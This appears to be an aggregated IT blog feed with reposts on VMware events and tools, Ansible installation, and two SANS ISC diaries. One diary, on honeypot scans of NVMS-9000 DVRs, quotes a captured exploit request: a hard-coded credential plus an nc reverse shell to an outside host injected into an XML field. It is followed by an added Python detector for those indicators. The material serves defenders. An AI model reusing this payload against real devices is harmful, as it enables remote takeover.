All posts by David

Schedule These Can’t-Miss VMworld 2019 Europe Sessions!

This post was originally published on this site

VMworld 2019 Europe is rapidly approaching, and with over 600 intriguing sessions to choose from, to say we are excited is as big an understatement as saying La Sagrada Familia is an interesting building. But, with so much choice, scheduling can get a little confusing. That’s why we’re highlighting several “can’t miss” sessions that address […]

The post Schedule These Can’t-Miss VMworld 2019 Europe Sessions! appeared first on VMware End-User Computing Blog.

Spousetivities in Barcelona at VMworld EMEA 2019


Barcelona is probably my favorite city in Europe—which works out well, since VMware seems to have settled on Barcelona as the destination for VMworld EMEA. VMworld is back in Barcelona again this year, and I’m fortunate enough to be able to attend. VMworld in Barcelona wouldn’t be the same without Spousetivities, though, and I’m happy to report that Spousetivities will be in Barcelona. In fact, registration is already open!

If you’re bringing along a spouse, significant other, boyfriend/girlfriend, or just some family members, you owe it to them to look into Spousetivities. You’ll be able to focus at the conference knowing that your loved one(s) are not only safe, but enjoying some amazing activities in and around Barcelona. Here’s a quick peek at what Crystal and her team have lined up this year:

  • A wine tour of the Penedes region (southwest of Barcelona)—attendees will get to see some amazing wineries not frequented by tourists!
  • A walking tour of Barcelona
  • A tapas cooking class
  • A fantastic walking tour of Costa Brava, Pals, and Girona
  • A sailing tour (it’s a 3 hour tour, but it won’t end up like Gilligan’s)

Lunch and private transportation are included for all activities, and all activities will depart from the conference center. Times are listed on the registration site.

It’s worth noting—even though I’ve said it before—that these activities are not your run-of-the-mill tourist activities. These are custom activities not available to the general public, specially arranged for Spousetivities participants.

Prices for all these activities are reduced thanks to Veeam’s sponsorship, and to help make things even more affordable there is a Full Week Pass that gives you access to all the activities at an additional discount. I’d like to personally thank Veeam for their continued support—I believe work/life balance is an important defense against burnout, and it’s great to see a company letting their actions demonstrate their support of work/life balance (instead of just empty corporate statements).

These activities will almost certainly sell out, so register today!

(BTW, for all things Spousetivities-related, be sure to check out the newly-updated Spousetivities web site.)

Scanning Activity for NVMS-9000 Digital Video Recorder, (Sun, Oct 20th)


Since the beginning of October, my honeypot has been capturing numerous scans for the NVMS-9000 DVR model, for which a PoC describing a “Stack Overflow in Base64 Authorization” was released last year[1].

DVR Activity NVMS-9000

The traffic captured by my honeypot matches the PoC, with the same Base64 username and password (admin:{12213BD1-69C7-4862-843D-260500D1DA40}), attempting to fork a reverse shell to redirect the traffic to a remote listener on TCP port 31337. The vendor advisory is posted here where they indicated a firmware update is available.

Here is an example of traffic you could expect to see in your logs:

20191020-025738: 192.168.25.9:80-84.150.176.93:34656 data 'POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: 586\r\nAccept-Language: en-us\r\nHost: XX.71.48.119\r\nAccept: */*\r\nUser-Agent: ApiTool\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>'

[1] https://raw.githubusercontent.com/mcw0/PoC/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
[2] http://en.tvt.net.cn/news/227.html
[3] https://manualzz.com/doc/9541049/cms-nvms-9000-presentation

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
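To check your own web or honeypot logs for the NVMS-9000 scan traffic described in the diary above, the following added example (not part of the original diary or of any ISC tooling) flags the three indicators visible in the sample request: the /editBlackAndWhiteList endpoint, the Basic credential quoted in the text, and an <ip> element whose value is not an IP address. The one-request-per-line log layout, the finding names and the sample lines are assumptions made for the example.

```python
import base64
import ipaddress
import re

# Values taken from the diary text; the log layout is an assumption based on its sample line.
KNOWN_CRED = "admin:{12213BD1-69C7-4862-843D-260500D1DA40}"
TARGET_PATH = "/editBlackAndWhiteList"
REQ_RE = re.compile(r"([A-Z]+) (/\S*) HTTP/1\.[01]")
AUTH_RE = re.compile(r"Authorization: Basic ([A-Za-z0-9+/]+={0,2})")
IP_RE = re.compile(r"<ip>(.*?)</ip>", re.S)

def is_ip_literal(value):
    """True only for a plain IPv4/IPv6 address, which is all an <ip> element should hold."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False

def analyze(line):
    """Return the indicators from the diary that one logged request matches."""
    findings = []
    req = REQ_RE.search(line)
    if req and req.group(2).split("?")[0] == TARGET_PATH:
        findings.append("target-endpoint")
    auth = AUTH_RE.search(line)
    if auth:
        try:
            cred = base64.b64decode(auth.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            cred = ""
        if cred == KNOWN_CRED:
            findings.append("known-credential")
    if any(not is_ip_literal(v) for v in IP_RE.findall(line)):
        findings.append("non-ip-in-ip-field")
    return findings

# Constructed sample lines (documentation-range addresses, placeholder command).
HDR = r"20191020-025738: 192.0.2.10:80-203.0.113.7:34656 data '"
SAMPLES = [
    HDR + r"POST /editBlackAndWhiteList HTTP/1.1\r\nAuthorization: Basic "
        + base64.b64encode(KNOWN_CRED.encode()).decode()
        + r"\r\n\r\n<item><ip>$(placeholder${IFS}command)</ip></item>'",
    HDR + r"POST /editBlackAndWhiteList HTTP/1.1\r\nAuthorization: Basic "
        + r"dXNlcjpwYXNz\r\n\r\n<item><ip>198.51.100.20</ip></item>'",
    HDR + r"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n'",
]

if __name__ == "__main__":
    for n, line in enumerate(SAMPLES, 1):
        print(n, analyze(line) or "no match")
```

A line that matches all three indicators corresponds to the request shown in the diary; the endpoint alone, with a valid address in <ip>, can be ordinary administration of the device's allow/deny list.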

ESXi host connectivity with vCenter Server


One interesting new feature in the latest version of vCSA is health monitoring. You can check the overall health with your vSphere Client, by selecting the vCenter node and then Monitor | Health. As explained in this blog post, vSphere Health works to identify and resolve potential issues before they have an impact on a customer’s environment and contains more than 30 different health checks that can be run against a vSphere environment. Usually it checks for bad drivers, CPU bugs and known problems. But it also runs some tests to check some services or […]

The post ESXi host connectivity with vCenter Server appeared first on vInfrastructure Blog.

VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots


VMware vRealize LifeCycle Manager 8 was released earlier this week, 17th October 2019. Note the official name and abbreviation, it’s a long one! vRSLCM (vRealize Suite LifeCycle Manager) You can find the supporting official documentation here; What’s New Blog Link: What’s New Blog Post Download Link: Product Download Release Notes: Release Notes Documentation Link: Resources Migration … Continue reading VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots

The post VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots appeared first on @Saintdle.


Automate Like A Service Provider With vRealize Automation – Part II


In my previous post, we discussed adding automation and self-service provisioning to your existing IT services. In this blog post, I’ll share some suggestions to help make it a reality.   Mature the delivery of IT services Step 1: Identify the Service Analyze your ticketing system and determine which requests for IT services are fairly

The post Automate Like A Service Provider With vRealize Automation – Part II appeared first on VMware Cloud Management.

What Assumptions Are You Making?, (Sat, Oct 19th)


If my security agents were not working correctly, then I would get an alert. Since no one said there is a problem with my security agents, then everything must be ok with them. These are just a couple of the assumptions that we make as cybersecurity practitioners each day about the security agents that serve to protect our respective organizations. While it is preferable to think that everything is ok, it is much better to validate that assumption regularly. 

I have been fortunate to work in cybersecurity for many years and at several diverse types of organizations. During that time, I always found it helpful to check on the status of the security agents periodically. I have found that by scheduling regular and recurring calendar reminders, I can better validate the assumption that the security agents are working as intended. Specific areas of focus include both confirming the security agent is installed correctly and that it is performing the actions specified in the policy. 

Central monitoring consoles are a great place to start for security agents that have not communicated back to the console within an acceptable time. The output from the console can be compared to the Inventory and Control of Hardware Assets to ensure that every system has a security agent installed. Whether an automated or manual task, this practical step can help to validate that assumption. 

What assumptions can you validate today? Think about that over the weekend and determine to take action on Monday morning! By being intentional to validate the health of your security agents, you can do a great deal to validate the assumptions you are making.

How long can you stand not to know when your security agents are not working as expected? Let us know of your successes in the comments section below!

 

Russell Eubanks

ISC Handler

@russelleubanks


(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
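The check described in the diary above, comparing the monitoring console's agent list with the hardware asset inventory, can be scripted as in this added example (not from the original diary). The CSV column names, the 24-hour threshold and the sample data are assumptions; real exports differ by product.

```python
import csv
import io
from datetime import datetime, timedelta, timezone

# Constructed sample exports; column names are assumptions, not any product's format.
INVENTORY_CSV = """hostname,owner
WEB01.corp.example,web
db01,data
hr-laptop-7,hr
build02,eng
"""
CONSOLE_CSV = """agent_host,last_checkin_utc
web01,2019-10-19T08:00:00
DB01.corp.example,2019-10-10T02:30:00
build02,2019-10-19T07:45:00
kiosk-unknown,2019-10-19T07:59:00
"""

def short_name(host):
    """Normalise case and strip the domain so FQDN and short names compare equal."""
    return host.strip().lower().split(".")[0]

def audit(inventory_csv, console_csv, now, max_silence=timedelta(hours=24)):
    """Compare inventory with console output; return the three gaps worth reviewing."""
    inventory = {short_name(r["hostname"])
                 for r in csv.DictReader(io.StringIO(inventory_csv))}
    last_seen = {}
    for r in csv.DictReader(io.StringIO(console_csv)):
        seen = datetime.fromisoformat(r["last_checkin_utc"]).replace(tzinfo=timezone.utc)
        host = short_name(r["agent_host"])
        last_seen[host] = max(seen, last_seen.get(host, seen))  # keep newest duplicate
    agents = set(last_seen)
    return {
        # In the inventory but never seen by the console: agent missing or never enrolled.
        "no_agent": sorted(inventory - agents),
        # Agent installed but silent for longer than the acceptable time.
        "stale": sorted(h for h in agents & inventory if now - last_seen[h] > max_silence),
        # Reporting agents on hosts the inventory does not know: an inventory gap.
        "not_in_inventory": sorted(agents - inventory),
    }

if __name__ == "__main__":
    now = datetime(2019, 10, 19, 9, 0, tzinfo=timezone.utc)
    for gap, hosts in audit(INVENTORY_CSV, CONSOLE_CSV, now).items():
        print(f"{gap}: {', '.join(hosts) or '-'}")
```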

How to install Ansible on Linux for vSphere configuration


Recently I took on a task to evaluate a few DevOps configuration, automation and orchestration tools for configuring VMware vSphere. There are many tools available in the market for DevOps automation. Personally, I like PowerCLI DSC, have worked with it before and have great expertise in it. Still, I preferred Ansible, since I have expertise with that tool as well and it has great community support. Plus, my entire team was using Ansible for configuration management of other products and had good hands-on experience with it. The Ansible server is called the controller. This software is only installed on Linux; there is no software for Windows. Here I am using CentOS 7 to install Ansible. Installation is very straightforward: just go through the commands below. First I will prepare the OS and update all the packages on Linux by running:

sudo yum update -y

Note: My Linux server (the Ansible controller) has direct access to the internet, and all the packages are installed from the online CentOS repository.


I will be installing Ansible using Python's pip. The command below installs python-setuptools. Why am I using pip here when yum can do the same task? I want Ansible and all the required modules to be of the same version, to avoid any dependency problems or conflicts. Differences between Ansible and module versions might cause issues; pip gives uniformity.

sudo yum install python-setuptools -y

This command installs PIP. PIP is a package manager for Python packages, or modules if you like.

sudo easy_install pip


This will install the actual Ansible controller software; an alternative to the pip command is sudo yum install ansible.

sudo pip install ansible 


This is the last step and shows how to install the Ansible module pyvmomi for vSphere. You can use the same step to install any other modules.

sudo pip install pyvmomi


Everything has installed correctly so far. It's time to test Ansible, which I will do using the ping module against localhost. After execution I get a success message, all in green, and the response to ping is pong. In the next article I will use it to configure ESXi servers.

ansible localhost -m ping


This completes the first part, installing Ansible and the pyvmomi module for vSphere. In the next parts I will work on configuring vSphere.


Special Webcast: SANS Cloud Security Operations Solutions Forum – October 18, 2019 8:30am US/Pacific


Speakers: Kenneth Hartman


All organizations must protect their confidential information. After all, it is this information that gives the organization its competitive value and enables it to achieve its mission. Security operations (SecOps) is focused on the day-to-day tasks necessary to protect the confidentiality, integrity, and availability of the organization’s data and the systems that process it. Moving this data to the cloud certainly creates some SecOps challenges. What works on-premise may not work effectively in the cloud and might not scale well.

Concerns about the trustworthiness of the cloud are the most significant barrier to cloud adoption. Knowing these apprehensions, Cloud Service Providers (CSP) and other solution providers are tackling this challenge head-on and have created innovative solutions to help cloud customers secure the data they process in the cloud. Cloud-native technical security controls that leverage application programming interfaces (API) and the software-defined aspects of cloud services enable customers to lock down their environments in ways that are not possible on-premise. These capabilities have caused some to argue that a properly configured cloud environment may be more secure.

The challenge with so much innovation and so many choices is that customers can get overwhelmed with all the hype in the marketplace. The SANS Cloud Security Operations Solutions Forum will focus on cloud security operations solutions that work, with a focus on providing specific technical advice directly from the vendor support engineers working in the field.

Earn 4 CPE Credit hours for attending this event.

Agenda: TBD

Speakers:

Kenneth Hartman

Kenneth G. Hartman is a security engineering leader in Silicon Valley. Ken’s motto is “I help my company earn and maintain the trust of our customers in our products and services.” Toward this end, Ken drives a comprehensive program portfolio of technical security initiatives focused on securing customers’ data in the AWS Cloud. Ken has worked for a variety of Cloud Service Providers in Architecture, Engineering, Compliance, and Security Product Management roles. From 2002-2011, Ken helped launch and lead a company called Visonex into a profitable, nation-wide dialysis-specific electronic medical record using a software-as-a-service (SaaS) business model. Ken holds a BS Electrical Engineering from Michigan Technological University and a Masters Degree in Information Security Engineering from SANS Technology Institute. Ken has earned the CISSP, as well as multiple GIAC security certifications, including the GIAC Security Expert. Ken is also a Licensed PI in Michigan as required by law to consult on criminal cases involving digital forensics.